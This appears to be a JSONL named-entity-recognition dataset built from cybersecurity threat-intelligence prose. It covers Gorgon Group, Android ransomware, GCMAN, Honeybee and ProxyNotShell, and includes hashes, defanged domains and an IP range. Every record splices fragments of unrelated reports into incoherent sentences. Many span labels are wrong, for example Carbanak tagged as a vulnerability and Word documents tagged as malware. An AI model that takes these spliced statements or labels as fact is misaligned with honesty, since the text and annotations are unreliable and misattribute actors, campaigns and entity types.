{"text": "Conclusion The \u201c Corona Updates \u201d app had relatively low downloads in Pakistan , India , Afghanistan , Bangladesh , Iran , Saudi Arabia , Austria , Romania , Grenada , and Russia . Kaspersky Lab 's research team responded to three financial institutions in Russia that were infected with the GCMAN malware . . Most organizations receive and make use of intelligence published from third parties such as government agencies , specialist providers or collaborative groups .", "spans": [{"start": 181, "end": 194, "label": "Organization"}, {"start": 231, "end": 253, "label": "Organization"}, {"start": 292, "end": 305, "label": "System"}, {"start": 403, "end": 422, "label": "Organization"}, {"start": 425, "end": 445, "label": "Organization"}, {"start": 449, "end": 469, "label": "Organization"}]}
{"text": "Perhaps the app \u2019 s false capabilities also fueled the low number of downloads . In one remarkable case , the Carbanak 2.0 gang used its access to a financial institution that stores information about shareholders to change the ownership details of a large company . Last , As the victims of commercial spyware are highly targeted individuals , the sobering truth is that some attackers have the means to be able to spend six figures to compromise a single target .", "spans": [{"start": 110, "end": 118, "label": "Vulnerability"}, {"start": 149, "end": 170, "label": "Organization"}, {"start": 292, "end": 310, "label": "System"}, {"start": 331, "end": 342, "label": "Organization"}]}
{"text": "It also appears the apps may still be in development or incubation , maybe waiting for a \u201c right time \u201d to inject the malicious codes . Recently Subaat drew our attention due to renewed targeted attack activity . but not least , Rhysida appears to have first popped up back in May , with several high - profile compromises posted on their leak site .", "spans": [{"start": 145, "end": 151, "label": "Organization"}, {"start": 229, "end": 236, "label": "Malware"}]}
{"text": "It \u2019 s also possible that the apps are being used to test other possible techniques . Technical analysis on some of the attacks as well as attribution links with Pakistan actors have been already depicted by 360 and Tuisec , in which they found interesting connections to a larger group of attackers Unit 42 researchers have been tracking , which we are calling Gorgon Group . in all cases explained here , This plan should outline specific actions and procedures for attack mitigation and remediation , including guidelines for addressing extortion demands .", "spans": [{"start": 171, "end": 177, "label": "Organization"}, {"start": 208, "end": 211, "label": "Organization"}, {"start": 216, "end": 222, "label": "Organization"}, {"start": 281, "end": 286, "label": "Organization"}, {"start": 290, "end": 299, "label": "Organization"}, {"start": 300, "end": 307, "label": "Organization"}, {"start": 362, "end": 374, "label": "Organization"}]}
{"text": "A possible indication for timing might be when the app reaches a specific number of downloads or infected devices . Starting in February 2018 , Palo Alto Networks identified a campaign of attacks performed by members of Gorgon Group targeting governmental organizations in the United Kingdom , Spain , Russia , and the United States . the tail instruction of the dispatcher predecessor can be a conditional jump like jnz , The difference between ProxyNotShell and the newly discovered exploit method we are calling OWASSRF .", "spans": [{"start": 144, "end": 162, "label": "Organization"}, {"start": 220, "end": 232, "label": "Organization"}, {"start": 243, "end": 269, "label": "Organization"}, {"start": 446, "end": 459, "label": "Vulnerability"}]}
{"text": "The coding style suggests that the cybercriminals behind this campaign are amateurs . Starting in February 2018 , Palo Alto Networks Unit 42 identified a not just goto . If passed , it would require U.S. financial institutions hit with ransomware to notify the Director of the Treasury Departments Financial Crimes Enforcement Network with details of the attack and the ransom demand .", "spans": [{"start": 114, "end": 140, "label": "Organization"}, {"start": 199, "end": 226, "label": "Organization"}, {"start": 236, "end": 246, "label": "Malware"}, {"start": 261, "end": 334, "label": "Organization"}]}
{"text": "The incomplete iOS codes used in this campaign may have been bought while other capabilities appear to have been added . of attacks performed by members of Gorgon Group targeting governmental organizations in the United Kingdom , Spain , Russia , and the United States . The modified code checks the tail instruction and if the true case destination is a control flow dispatcher , JumpCloud reported this unauthorized access impacted fewer than five customers and less than 10 devices .", "spans": [{"start": 15, "end": 18, "label": "System"}, {"start": 156, "end": 168, "label": "Organization"}, {"start": 179, "end": 205, "label": "Organization"}, {"start": 381, "end": 390, "label": "Organization"}]}
{"text": "This may also explain the timing in between the apps becoming fully functional and \u201c incubation. \u201d As this is a group we have not observed before , we will continue monitoring this campaign for further developments . The GCMAN group has moved beyond banks and is now targeting the budgeting and accounting departments in any organization of interest to them , using the same APT-style tools and techniques . it updates the CFG and the destination of the instruction . This also ties into the fact that cyber criminals are competitive by nature , and they love the challenge their actions bring .", "spans": [{"start": 221, "end": 232, "label": "Organization"}, {"start": 250, "end": 255, "label": "Organization"}, {"start": 281, "end": 290, "label": "Organization"}, {"start": 295, "end": 317, "label": "Organization"}, {"start": 502, "end": 517, "label": "Organization"}]}
{"text": "Users are cautioned to research and check reviews before they download apps . Starting in February 2018 , Unit 42 identified a campaign of attacks performed by members of Gorgon Group targeting governmental organizations in the United Kingdom , Spain , Russia , and the United States . The following changes are minor compared with above referenced ones . For connections that occur internally within an enclave ( such as those between a proxy or pivot node and other nodes ) , commonly used protocols are SMB , SSH , or RDP .", "spans": [{"start": 106, "end": 113, "label": "Organization"}, {"start": 171, "end": 183, "label": "Organization"}, {"start": 194, "end": 220, "label": "Organization"}, {"start": 506, "end": 509, "label": "System"}, {"start": 512, "end": 515, "label": "System"}, {"start": 521, "end": 524, "label": "System"}]}
{"text": "Observe and look at the app \u2019 s display and text , stated functions , reviews from other users , and requested permissions before downloading . APT38 's increasingly aggressive targeting against banks . Additional jump instructions are supported when collecting block comparison variable candidates and mapping between the variable and ea or block number ( jnz/jle in JZCollector , The syntax of the command fragment includes \u201c scilc.exe \u201d , a native utility that is part of the MicroSCADA software suite .", "spans": [{"start": 144, "end": 149, "label": "Organization"}, {"start": 195, "end": 200, "label": "Organization"}, {"start": 368, "end": 379, "label": "System"}, {"start": 382, "end": 506, "label": "Malware"}]}
{"text": "Make sure that all other apps installed and the device operating systems are updated to the latest version . Gorgon Group used common URL shortening services to download payloads . jnz in JZMapper ) The PDFs used highly relevant , well - crafted content that fabricated human rights seminar information and Ukraine \u2019s foreign policy and NATO membership plans , and were rigged with exploits attacking Adobe Reader versions 9 , 10 and 11 , bypassing its sandbox .", "spans": [{"start": 109, "end": 121, "label": "Organization"}, {"start": 188, "end": 196, "label": "System"}, {"start": 401, "end": 436, "label": "System"}]}
{"text": "Indicators of Compromise ( IoCs ) SHA256 Detection e394e53e53cd9047d6cff184ac333ef7698a34b777ae3aac82c2c669ef661dfe AndroidOS_SpyAgent.HRXB e8d4713e43241ab09d40c2ae8814302f77de76650ccf3e7db83b3ac8ad41f9fa AndroidOS_ProjectSpy.HRX 29b0d86ae68d83f9578c3f36041df943195bc55a7f3f1d45a9c23f145d75af9d The GCMAN group has moved beyond banks and is now targeting the budgeting and accounting departments in any organization of interest to them , using the same APT-style tools and techniques . . On April 16 , 2022 , KillNet dedicated its attack on a U.S. energy company to REvil .", "spans": [{"start": 51, "end": 115, "label": "Indicator"}, {"start": 116, "end": 139, "label": "Indicator"}, {"start": 140, "end": 204, "label": "Indicator"}, {"start": 230, "end": 294, "label": "Indicator"}, {"start": 299, "end": 310, "label": "Organization"}, {"start": 328, "end": 333, "label": "Organization"}, {"start": 359, "end": 368, "label": "Organization"}, {"start": 373, "end": 395, "label": "Organization"}, {"start": 509, "end": 516, "label": "Organization"}, {"start": 543, "end": 562, "label": "Organization"}, {"start": 566, "end": 571, "label": "Organization"}]}
{"text": "AndroidOS_ProjectSpy.HRX 3a15e7b8f4e35e006329811a6a2bf291d449884a120332f24c7e3ca58d0fbbdb IOS_ProjectSpy.A URLs cashnow [ . APT38 has paralleled North Korea 's worsening financial condition . An entropy threshold adjustment due to check in high maturity level . Knowing what motivates hackers is a key part of keeping them out of your business", "spans": [{"start": 25, "end": 89, "label": "Indicator"}, {"start": 90, "end": 106, "label": "Indicator"}, {"start": 112, "end": 123, "label": "Indicator"}, {"start": 124, "end": 129, "label": "Organization"}]}
{"text": "] ee Backend server ftp [ . On much of the C2 infrastructure we identified several crimeware family samples . Multiple block tracking for getting block comparison variable . None Why are Cyber Criminals More Likely to Target Small to Midsize Businesses \"", "spans": [{"start": 13, "end": 27, "label": "Indicator"}, {"start": 187, "end": 202, "label": "Organization"}, {"start": 225, "end": 252, "label": "Organization"}]}
{"text": "] XXXX [ . While investigating the domains and infrastructure used by the phishing components of Gorgon Group , Unit 42 researchers witnessed several common operational security flaws with Gorgon Group 's actors throughout their many campaigns . And the last change that was introduced in regards to ConfuserEx obfuscator , an obfuscator that is very commonly used by malicious actors to obfuscate .NET code , is used with various levels of obfuscation , anti - tampering and anti - debugging , which makes the unpacking more difficult for malware researchers .", "spans": [{"start": 97, "end": 109, "label": "Organization"}, {"start": 112, "end": 119, "label": "Organization"}, {"start": 189, "end": 211, "label": "Organization"}, {"start": 300, "end": 310, "label": "System"}, {"start": 368, "end": 384, "label": "Organization"}, {"start": 398, "end": 407, "label": "Malware"}]}
{"text": "] com Backend server spy [ . 360 and Tuisec already identified some Gorgon Group members . the block update variable referred in the overview . Cybercriminals continue to identify and exploit an organizations weak spots and use common even basic techniques , including phishing or remote desktop protocol RDP to launch ransomware attacks , gain access to sensitive data , disrupt operations and , in some cases , put lives at risk .", "spans": [{"start": 14, "end": 28, "label": "Indicator"}, {"start": 29, "end": 32, "label": "Organization"}, {"start": 37, "end": 43, "label": "Organization"}, {"start": 68, "end": 80, "label": "Organization"}, {"start": 81, "end": 88, "label": "Organization"}]}
{"text": "] cashnow [ . RATs such as NjRat and infostealers like Lokibot were leveraging the same C2 infrastructure as that of the targeted attacks . Some functions in the ANEL sample utilize this , As these attacks continue to grow , security teams need tools to help save time and address the threats more effectively .", "spans": [{"start": 14, "end": 18, "label": "System"}, {"start": 27, "end": 32, "label": "System"}, {"start": 55, "end": 62, "label": "System"}, {"start": 162, "end": 166, "label": "Malware"}, {"start": 225, "end": 239, "label": "Organization"}]}
{"text": "] ee Backend server xyz [ . it 's not known if the attackers physically reside in Pakistan . however the assignment is a little bit tricky . Specifically , the exec_signing_id field within the XPdb contains information about the signature of the binary , which can be used to help identify the author of a particular signed binary .", "spans": [{"start": 13, "end": 27, "label": "Indicator"}, {"start": 51, "end": 60, "label": "Organization"}, {"start": 156, "end": 330, "label": "Indicator"}]}
{"text": "] cashnow [ . Gorgon used numerous decoy documents and phishing emails , both styles of attacks lacked overall sophistication . By using the and instruction , As confirmed by our own research data , CISA also found LockBit took the top spot as the biggest global ransomware threat in 2022 .", "spans": [{"start": 14, "end": 20, "label": "Organization"}, {"start": 199, "end": 203, "label": "Organization"}, {"start": 215, "end": 222, "label": "Organization"}]}
{"text": "] ee Backend server October 8 , 2020 Sophisticated new Android malware marks the latest evolution of mobile ransomware Attackers are persistent and motivated to continuously evolve \u2013 and no platform is immune . While it 's not known if the attackers physically reside in Pakistan , all members of Gorgon Group purport to be in Pakistan based on their online personas . the immediate values used in comparison look different from assigned ones . COSMICENERGY accomplishes this via its two derivative components , which we track as PIEHOP and LIGHTWORK ( see appendices for technical analyses ) .", "spans": [{"start": 55, "end": 62, "label": "System"}, {"start": 240, "end": 249, "label": "Organization"}, {"start": 297, "end": 309, "label": "Organization"}, {"start": 445, "end": 457, "label": "Malware"}, {"start": 530, "end": 536, "label": "System"}, {"start": 541, "end": 550, "label": "System"}]}
{"text": "That is why Microsoft has been working to extend its industry-leading endpoint protection capabilities beyond Windows . Starting in mid-February , Unit 42 researchers have been tracking an active campaign sharing a significant portion of infrastructure leveraged by Gorgon Group for criminal and targeted attacks . The modified code will consider this . Kaspersky \u2019s Global Research and Analysis Team ( GReAT ) has observed signs of its attacks in several countries including Germany , South Korea and Uzbekistan , as well as the US .", "spans": [{"start": 12, "end": 21, "label": "Organization"}, {"start": 110, "end": 117, "label": "System"}, {"start": 147, "end": 154, "label": "Organization"}, {"start": 266, "end": 278, "label": "Organization"}, {"start": 354, "end": 410, "label": "Organization"}]}
{"text": "The addition of mobile threat defense into these capabilities means that Microsoft Defender for Endpoint ( previously Microsoft Defender Advanced Threat Protection ) now delivers protection on all major platforms . Unit 42 researchers have been tracking Gorgon Group for criminal and targeted attacks . The modified tool was tested with an ANEL 5.4.1 payload dropped from a malicious document with the following hash ( previously reported by FireEye ) : The malware is designed to steal browser cookies and take advantage of authenticated Facebook sessions to steal information from the victim 's Facebook account and ultimately hijack any Facebook Business account that the victim has sufficient access to .", "spans": [{"start": 73, "end": 91, "label": "System"}, {"start": 118, "end": 163, "label": "System"}, {"start": 215, "end": 222, "label": "Organization"}, {"start": 254, "end": 266, "label": "Organization"}, {"start": 340, "end": 344, "label": "Malware"}, {"start": 442, "end": 449, "label": "Organization"}, {"start": 458, "end": 465, "label": "Malware"}]}
{"text": "Microsoft \u2019 s mobile threat defense capabilities further enrich the visibility that organizations have on threats in their networks , as well as provide more tools to detect and respond to threats across domains and across platforms . As part of the investigation , Unit 42 researchers were able to identify an interesting characteristic about how the Gorgon Group crew uses shared infrastructure between cybercrime and targeted attacks . 3d2b3c9f50ed36bef90139e6dd250f140c373664984b97a97a5a70333387d18d . The collective has claimed responsibility for DDoS attacks , data theft , and leaks against entities across multiple industries , including transportation , defense , government and military , financial services , global institutions , and telecommunications .", "spans": [{"start": 0, "end": 9, "label": "Organization"}, {"start": 266, "end": 273, "label": "Organization"}, {"start": 352, "end": 364, "label": "Organization"}, {"start": 375, "end": 396, "label": "System"}, {"start": 439, "end": 503, "label": "Indicator"}, {"start": 552, "end": 564, "label": "Organization"}]}
{"text": "Like all of Microsoft \u2019 s security solutions , these new capabilities are likewise backed by a global network of threat researchers and security experts whose deep understanding of the threat landscape guide the continuous innovation of security features and ensure that customers are protected from ever-evolving threats . The crew combines both regular crime and targeted attack objectives using the same domain infrastructure over time , rarely changing their TTPs . The code is able to deobfuscate 34 of 38 functions ( 89% ) In recent years , healthcare providers are increasingly being targeted with coordinated , sophisticated Phishing and Business Email Compromise BEC campaigns .", "spans": [{"start": 12, "end": 21, "label": "Organization"}, {"start": 407, "end": 428, "label": "System"}, {"start": 547, "end": 567, "label": "Organization"}]}
{"text": "For example , we found a piece of a particularly sophisticated Android ransomware with novel techniques and behavior , exemplifying the rapid evolution of mobile threats that we have also observed on other platforms . One interesting note about the criminal activity of Gorgon Group is their usage of Bitly . . The differences between commercial spyware and digital extortion attacks You may have received an email something like , \u201c We know you \u2019ve visited this adult website .", "spans": [{"start": 63, "end": 70, "label": "System"}, {"start": 270, "end": 282, "label": "Organization"}, {"start": 301, "end": 306, "label": "System"}, {"start": 335, "end": 353, "label": "System"}, {"start": 358, "end": 383, "label": "Organization"}]}
{"text": "The mobile ransomware , detected by Microsoft Defender for Endpoint as AndroidOS/MalLocker.B , is the latest variant of a ransomware family that \u2019 s been in the wild for a while but has been evolving non-stop . Between April 1 , 2018 and May 30 , 2018 , we observed the domain stevemike-fireforce.info used in a Gorgon Group cybercrime campaign involving more than 2,300 emails and 19 documents in the initial attack . It should be noted every function is not always obfuscated . Ashley Madison \u2019s executives understood that only a handful of employees at the time would have had access to the systems needed to produce the screenshots McNeill published online .", "spans": [{"start": 36, "end": 54, "label": "System"}, {"start": 71, "end": 92, "label": "Indicator"}, {"start": 594, "end": 660, "label": "System"}]}
{"text": "This ransomware family is known for being hosted on arbitrary websites and circulated on online forums using various social engineering lures , including masquerading as popular apps , cracked games , or video players . Similar to that of their targeted attacks , Gorgon Group leveraged Bitly for distribution and shortening of C2 domains . The failure examples are : From what we \u2019ve seen in Hack520 \u2019s blog , as well as the infrastructure deployed around it , it is quite safe to say that Hack520 is involved in aspects of the VPS service activity provided to groups like Winnti and other cybercriminals or threat actors .", "spans": [{"start": 264, "end": 276, "label": "Organization"}, {"start": 287, "end": 292, "label": "System"}, {"start": 393, "end": 408, "label": "Organization"}, {"start": 529, "end": 540, "label": "System"}, {"start": 574, "end": 580, "label": "Organization"}, {"start": 609, "end": 622, "label": "Organization"}]}
{"text": "The new variant caught our attention because it \u2019 s an advanced malware with unmistakable malicious characteristic and behavior and yet manages to evade many available protections , registering a low detection rate against security solutions . Beginning in early March 2018 , Unit 42 started observing targeted attacks against Russian , Spanish and United States government agencies operating in Pakistan . Not yet implemented cases ( e.g , Darkrace specifically targets Windows operating systems and has several similarities to LockBit .", "spans": [{"start": 276, "end": 283, "label": "Organization"}, {"start": 363, "end": 382, "label": "Organization"}, {"start": 441, "end": 449, "label": "Malware"}, {"start": 471, "end": 496, "label": "System"}, {"start": 529, "end": 536, "label": "Organization"}]}
{"text": "As with most Android ransomware , this new threat doesn \u2019 t actually block access to files by encrypting them . Leveraging click counts for the campaign for Bitly , we were able to see Gorgon Group 's activity volume increase throughout April . a conditional jump of the dispatcher predecessor\u2019s tail instruction in goto N predecessors case , SysUpdate is a featurerich backdoor that has multiple capabilities , including", "spans": [{"start": 13, "end": 20, "label": "System"}, {"start": 157, "end": 162, "label": "System"}, {"start": 185, "end": 197, "label": "Organization"}, {"start": 343, "end": 352, "label": "Malware"}]}
{"text": "Instead , it blocks access to devices by displaying a screen that appears over every other window , such that the user can \u2019 t do anything else . As we continued to investigate , it became apparent that Gorgon Group had been consistently targeting worldwide governmental organizations operating within Pakistan . consecutive if-statement flattened blocks ) FULLHOUSE.DOORED ( com.docker.vmnat , npx - cli , us.zoom . ZoomUpdate )", "spans": [{"start": 203, "end": 215, "label": "Organization"}, {"start": 258, "end": 284, "label": "Organization"}, {"start": 357, "end": 373, "label": "System"}]}
{"text": "The said screen is the ransom note , which contains threats and instructions to pay the ransom . Starting in mid-February . . The file path at the end of the configuration is used to store configuration data that is encrypted using AES-128 .", "spans": [{"start": 126, "end": 241, "label": "Indicator"}]}
{"text": "What \u2019 s innovative about this ransomware is how it displays its ransom note . Additionally , during that time , members of Gorgon Group were also performing criminal operations against targets across the globe , often using shared infrastructure with their targeted attack operations . An incorrect choice of control flow dispatcher and first block ( algorithm error ) Mandiant has observed RGB units utilize a series of Operational Relay Boxes ( ORBs ) using L2TP IPsec tunnels along with commercial VPN providers to obscure their source address .", "spans": [{"start": 124, "end": 136, "label": "Organization"}, {"start": 225, "end": 246, "label": "System"}, {"start": 370, "end": 378, "label": "Organization"}, {"start": 392, "end": 401, "label": "Organization"}]}
{"text": "In this blog , we \u2019 ll detail the innovative ways in which this ransomware surfaces its ransom note using Android features we haven \u2019 t seen leveraged by malware before , as well as incorporating an open-source machine learning module designed for context-aware cropping of its ransom note . Unit 42 researchers have been tracking an active campaign . . The IP range for \u201c PIG GOD \u201d is 43[.]255[.]188.0/22 , which appears to be hosted in Hong Kong as seen in the information we found : The domain 66[.]to leads to another website that shows Hack520 \u2019s pet pig .", "spans": [{"start": 106, "end": 113, "label": "System"}, {"start": 292, "end": 299, "label": "Organization"}, {"start": 354, "end": 405, "label": "Indicator"}, {"start": 497, "end": 504, "label": "Indicator"}]}
{"text": "New scheme , same goal In the past , Android ransomware used a special permission called \u201c SYSTEM_ALERT_WINDOW \u201d to display their ransom note . This Gorgon Group campaign leveraged spear phishing emails with Microsoft Word documents exploiting CVE-2017-0199 . These fixes will be prioritized for future releases . The key to the success of an effort like No More Ransomware is informationsharing and collaboration .", "spans": [{"start": 37, "end": 44, "label": "System"}, {"start": 208, "end": 232, "label": "Malware"}, {"start": 244, "end": 257, "label": "Vulnerability"}]}
{"text": "Apps that have this permission can draw a window that belongs to the system group and can \u2019 t be dismissed . Beginning in early March 2018 , Unit 42 started observing Gorgon group attacks against Russian , Spanish and United States government agencies operating in Pakistan . Additionally there is a known issue with the result ( e.g , the remaining loop or paradoxical decompiled code ) With regards to these similarities , we highlight the following trends which could manifest in future OT malware : \u2022", "spans": [{"start": 141, "end": 148, "label": "Organization"}, {"start": 232, "end": 251, "label": "Organization"}, {"start": 490, "end": 500, "label": "Malware"}]}
{"text": "No matter what button is pressed , the window stays on top of all other windows . Like all of Gorgon Group 's members , Fudpage 's online profile , infrastructure utilization and standardization , connects them back to Gorgon Group . , A typical log entry showing access to the PowerShell backend is detailed in the Remote PowerShell HTTP logs , located in , such as in the example below : CrowdStrike incident responders discovered Remote PowerShell logs similar to log entries for ProxyNotShell exploitation to gain initial access , suggesting the attacker leveraged Remote PowerShell .", "spans": [{"start": 94, "end": 106, "label": "Organization"}, {"start": 148, "end": 174, "label": "System"}, {"start": 179, "end": 194, "label": "System"}, {"start": 219, "end": 231, "label": "Organization"}, {"start": 236, "end": 343, "label": "Indicator"}, {"start": 390, "end": 421, "label": "Organization"}, {"start": 433, "end": 532, "label": "Indicator"}, {"start": 550, "end": 558, "label": "Organization"}, {"start": 569, "end": 586, "label": "System"}]}
{"text": "The notification was intended to be used for system alerts or errors , but Android threats misused it to force the attacker-controlled UI to fully occupy the screen , blocking access to the device . Ultimately , this lead us to the conclusion that several of Gorgon Group 's members have a nexus in Pakistan . using the following IDAPython command in Output window : The attackers then ran reconnaissance commands such as whoami , netstat , quser , and net share , and tried to enumerate other servers for lateral movement with the quser and net view commands .", "spans": [{"start": 75, "end": 82, "label": "System"}, {"start": 259, "end": 271, "label": "Organization"}, {"start": 330, "end": 339, "label": "System"}, {"start": 371, "end": 380, "label": "Organization"}, {"start": 422, "end": 428, "label": "System"}, {"start": 431, "end": 438, "label": "System"}, {"start": 441, "end": 446, "label": "System"}, {"start": 453, "end": 462, "label": "System"}, {"start": 532, "end": 537, "label": "System"}, {"start": 542, "end": 550, "label": "System"}]}
{"text": "Attackers create this scenario to persuade users to pay the ransom so they can gain back access to the device . Gorgon Group isn't the first actor group we've witnessed dabble in both nation state level and criminal attacks . idc.load_and_run_plugin None C2 RSA Verification", "spans": [{"start": 112, "end": 124, "label": "Organization"}, {"start": 141, "end": 152, "label": "Organization"}]}
{"text": "To catch these threats , security solutions used heuristics that focused on detecting this behavior . Overall , in spite of the lack of sophistication in Gorgon Group 's activity , they were still relatively successful ; once again proving that simple attacks on individuals without proper protections , work . ( A typical web request to the frontend to exploit the SSRF vulnerability on CVE-2022 - 41040 involves some variation of path confusion that references the endpoint as shown below : The backend request for a typical ProxyNotShell exploitation is shown below : Once the PowerShell remoting service can be reached , the second step involves vulnerability CVE-2022 - 41082 being exploited in order to execute arbitrary commands .", "spans": [{"start": 154, "end": 166, "label": "Organization"}, {"start": 366, "end": 384, "label": "Vulnerability"}, {"start": 388, "end": 404, "label": "Vulnerability"}]}
{"text": "Google later implemented platform-level changes that practically eliminated this attack surface . On January 15 , Advanced Threat Research discovered an operation using a new variant of the SYSCON backdoor . \u201c HexRaysDeob \u201d The script downloads two files to locations defined by the variables ffn and fn , but only the first file is executed via the system function .", "spans": [{"start": 0, "end": 6, "label": "Organization"}, {"start": 114, "end": 138, "label": "Organization"}, {"start": 190, "end": 205, "label": "System"}, {"start": 210, "end": 221, "label": "System"}]}
{"text": "These changes include : Removing the SYSTEM_ALERT_WINDOW error and alert window types , and introducing a few other types as replacement Elevating the permission status of SYSTEM_ALERT_WINDOW to special permission by putting it into the \u201c above dangerous \u201d category , which means that users have to go through many screens to approve apps that ask for permission , instead of just one click Introducing an overlay kill switch on Android 8.0 and later that users can activate anytime to deactivate a system alert window To adapt , Android malware evolved to misusing The Korean-language Word document manual.doc appeared in Vietnam on January 17 , with the original author name of Honeybee . , The focus should be on isolating the affected devices andor networks to prevent further spread and minimize the impact .", "spans": [{"start": 429, "end": 440, "label": "System"}, {"start": 530, "end": 537, "label": "System"}, {"start": 586, "end": 599, "label": "System"}, {"start": 600, "end": 610, "label": "Malware"}, {"start": 680, "end": 688, "label": "Organization"}]}
{"text": "other features , but these aren \u2019 t as effective . While Gorgon Group has been making minor changes in their methodologies , they are still actively involved in both targeted and criminal attacks . 0xdead ) All protocols use their standard assigned ports.[2][3 ] Dragonfly has used SMB for C2.[4 ]", "spans": [{"start": 57, "end": 69, "label": "Organization"}, {"start": 263, "end": 272, "label": "Organization"}, {"start": 282, "end": 285, "label": "System"}, {"start": 290, "end": 295, "label": "System"}]}
{"text": "For example , some strains of ransomware abuse accessibility features , a method that could easily alarm users because accessibility is a special permission that requires users to go through several screens and accept a warning that the app will be able to monitor activity via accessibility services . This malicious document contains a Visual Basic macro that dropped and executed an upgraded version of the implant known as SYSCON , which appeared in 2017 in malicious Word documents as part of several campaigns using North Korea\u2013related topics . . These servers may be approved , but a compromised network endpoint can be modified to mask the final destination of the server requests originating externally .", "spans": [{"start": 427, "end": 433, "label": "System"}, {"start": 462, "end": 486, "label": "Malware"}]}
{"text": "Other ransomware families use infinite loops of drawing non-system windows , but in between drawing and redrawing , it \u2019 s possible for users to go to settings and uninstall the offending app . This key was also used in the Honeybee campaign and appears to have been used since August 2017 . The command will instruct the code to execute only opaque predicates deobfuscation in the current selected function . No More Ransom now includes 185 partners from the public sector , private industry , law enforcement , and academia .", "spans": [{"start": 67, "end": 74, "label": "System"}]}
{"text": "The new Android ransomware variant overcomes these barriers by evolving further than any Android malware we \u2019 ve seen before . Several additional documents surfaced between January 17 and February 3 . This allows an analyst to quickly check if there are any lost blocks by control flow unflattening . one base64 encoded string but multiple , separated by a character .", "spans": [{"start": 8, "end": 15, "label": "Malware"}, {"start": 89, "end": 96, "label": "Malware"}, {"start": 342, "end": 366, "label": "Malware"}]}
{"text": "To surface its ransom note , it uses a series of techniques that take advantage of the following components on Android : The \u201c call \u201d notification , among several categories of notifications that Android supports , which requires immediate user attention . All contain the same Visual Basic macro code and author name as Honeybee . After the check , Pikabot is a new malware first seen in early 2023 .", "spans": [{"start": 111, "end": 118, "label": "System"}, {"start": 196, "end": 203, "label": "System"}, {"start": 321, "end": 329, "label": "Organization"}, {"start": 350, "end": 357, "label": "Malware"}]}
{"text": "The \u201c onUserLeaveHint ( ) \u201d callback method of the Android Activity ( i.e. , the typical GUI screen the user sees ) is called as part of the activity lifecycle when the activity is about to go into the background as a result of user choice , for example , when the user presses the Home key . Some of the malicious documents were test files without the implant . the original result can be restored by using the following command : There are several methods in which SCIL programs can execute , such as an engineer / operator clicking a button or image within the MicroSCADA system , scheduled or process derived changes , or in this case manual execution .", "spans": [{"start": 51, "end": 67, "label": "System"}, {"start": 330, "end": 340, "label": "System"}, {"start": 564, "end": 581, "label": "System"}]}
{"text": "The malware connects the dots and uses these two components to create a special type of notification that triggers the ransom screen via the callback . From our analysis , Honeybee submitted most of these documents from South Korea , indicating that some of the targeting was in South Korea . idc.load_and_run_plugin Additionally , 20 said they had experienced data breaches by former employees .", "spans": [{"start": 172, "end": 180, "label": "Organization"}]}
{"text": "As the code snippet shows , the malware creates a notification builder and then does the following : setCategory ( \u201c call \u201d ) \u2013 This means that the notification is built as a very important notification that needs special privilege . Honeybee attacked beyond the borders of South Korea to target Vietnam , Singapore , Argentina , Japan , Indonesia , and Canada . ( On hosts of interest , Agrius deploys its own custom malware a .NET backdoor called IPsec Helper , which registers itself as a service to establish persistence .", "spans": [{"start": 234, "end": 242, "label": "Organization"}, {"start": 388, "end": 394, "label": "Organization"}, {"start": 418, "end": 425, "label": "Malware"}, {"start": 442, "end": 461, "label": "Malware"}]}
{"text": "setFullScreenIntent ( ) \u2013 This API wires the notification to a GUI so that it pops up when the user taps on it . Honeybee appears to target humanitarian aid and inter-Korean affairs . \u201c HexRaysDeob \u201d However , over time , it becomes tedious for fraudsters to constantly change information when registering new domains .", "spans": [{"start": 113, "end": 121, "label": "Organization"}, {"start": 186, "end": 197, "label": "System"}, {"start": 245, "end": 255, "label": "Organization"}]}
{"text": "At this stage , half the job is done for the malware . McAfee Advanced Threat Research team 's analysis , we find multiple components from this operation are unique from a code perspective , even though the code is loosely based on previous versions of the SYSCON backdoor . , It allows security researchers to analyze the source code and understand the attacker \u2019s tactics , techniques and procedures ( TTPs ) , which helps security professionals develop effective detection rules and enhance security products ' capabilities in combating ransomware threats .", "spans": [{"start": 55, "end": 86, "label": "Organization"}, {"start": 257, "end": 272, "label": "System"}]}
{"text": "However , the malware wouldn \u2019 t want to depend on user interaction to trigger the ransomware screen , so , it adds another functionality of Android callback : As the code snippet shows , the malware overrides the onUserLeaveHint ( ) callback function of Activity class . Large-scale cyber espionage campaigns such as \" GhostNet \" . 0xf001 ) Therefore , having access to such code allows threat actors with minimum programming knowledge to modify and compile their own ransomware variants .", "spans": [{"start": 141, "end": 148, "label": "System"}]}
{"text": "The function onUserLeaveHint ( ) is called whenever the malware screen is pushed to background , causing the in-call Activity to be automatically brought to the foreground . As the crisis in Syria escalates , FireEye researchers have discovered a cyber espionage campaign , which we call \" Ke3chang \" , that falsely advertises information updates about the ongoing crisis to compromise MFA networks in Europe . . The campaign started in at least June 2023 , and the ransom note appears to mimic certain aspects of the ransom note used in the global WannaCry attacks from 2017 .", "spans": [{"start": 209, "end": 216, "label": "Organization"}, {"start": 290, "end": 298, "label": "Organization"}]}
{"text": "Recall that the malware hooked the RansomActivity intent with the notification that was created as a \u201c call \u201d type notification . As the crisis in Syria escalates , FireEye researchers have discovered a threat group , which we call \" Ke3chang \" , that falsely advertises information updates about the ongoing crisis to compromise MFA networks in Europe . The compiler-level obfuscations like opaque predicates and control flow flattening are started to be observed in the wild by analyst and researchers . As for who was hit the hardest , around 16 percent of ransomware incidents affecting State , Local , Tribal , and Tribunal ( SLTT ) governments were from LockBit , says the MS - ISAC .", "spans": [{"start": 165, "end": 172, "label": "Organization"}, {"start": 203, "end": 215, "label": "Organization"}, {"start": 234, "end": 242, "label": "Organization"}, {"start": 591, "end": 649, "label": "Organization"}, {"start": 660, "end": 667, "label": "Organization"}, {"start": 679, "end": 688, "label": "Organization"}]}
{"text": "This creates a chain of events that triggers the automatic pop-up of the ransomware screen without doing infinite redraw or posing as system window . We believe that the Ke3chang attackers are operating out of China and have been active since at least 2010 . Currently malware with the obfuscations is limited , We would also like to thank Trellix for our continued partnership and for providing supporting detection YARA rules and associated indicators .", "spans": [{"start": 170, "end": 178, "label": "Organization"}, {"start": 179, "end": 188, "label": "Organization"}, {"start": 340, "end": 347, "label": "Organization"}, {"start": 417, "end": 427, "label": "Malware"}]}
